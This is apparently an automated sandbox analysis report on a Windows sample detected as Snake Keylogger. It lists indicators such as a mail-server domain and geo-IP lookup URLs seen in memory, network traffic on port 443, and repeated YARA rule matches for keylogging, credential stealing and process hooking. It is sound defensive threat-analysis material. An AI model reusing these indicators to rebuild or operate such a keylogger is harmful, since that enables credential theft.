            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.erkanlarofis.com.tr
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33p
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_00874B000_2_00874B00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_0087D5DC0_2_0087D5DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_02677BB80_2_02677BB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_026700400_2_02670040
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_026700130_2_02670013
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_02677BA80_2_02677BA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD84200_2_06AD8420
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD04000_2_06AD0400
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD03FF0_2_06AD03FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD03C80_2_06AD03C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD7FE80_2_06AD7FE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD9F000_2_06AD9F00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD9AB80_2_06AD9AB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD9AC80_2_06AD9AC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 0_2_06AD7BB00_2_06AD7BB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAF01F4_2_00FAF01F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAC1904_2_00FAC190
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA61084_2_00FA6108
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAB3284_2_00FAB328
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAC4704_2_00FAC470
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAC7514_2_00FAC751
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA67304_2_00FA6730
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA98584_2_00FA9858
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA4AD94_2_00FA4AD9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FACA314_2_00FACA31
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FABBD24_2_00FABBD2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FABEB04_2_00FABEB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAB4F34_2_00FAB4F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FA35704_2_00FA3570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAE5404_2_00FAE540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_00FAE52F4_2_00FAE52F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_05642E134_2_05642E13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_05642E184_2_05642E18
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2029787310.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2030808556.00000000026E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2032585994.0000000006780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2032456578.0000000005180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMML.dll2 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.000000000387E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2033048840.00000000083F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEe vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3265021892.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeBinary or memory string: OriginalFilenamePHCd.exe: vs SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
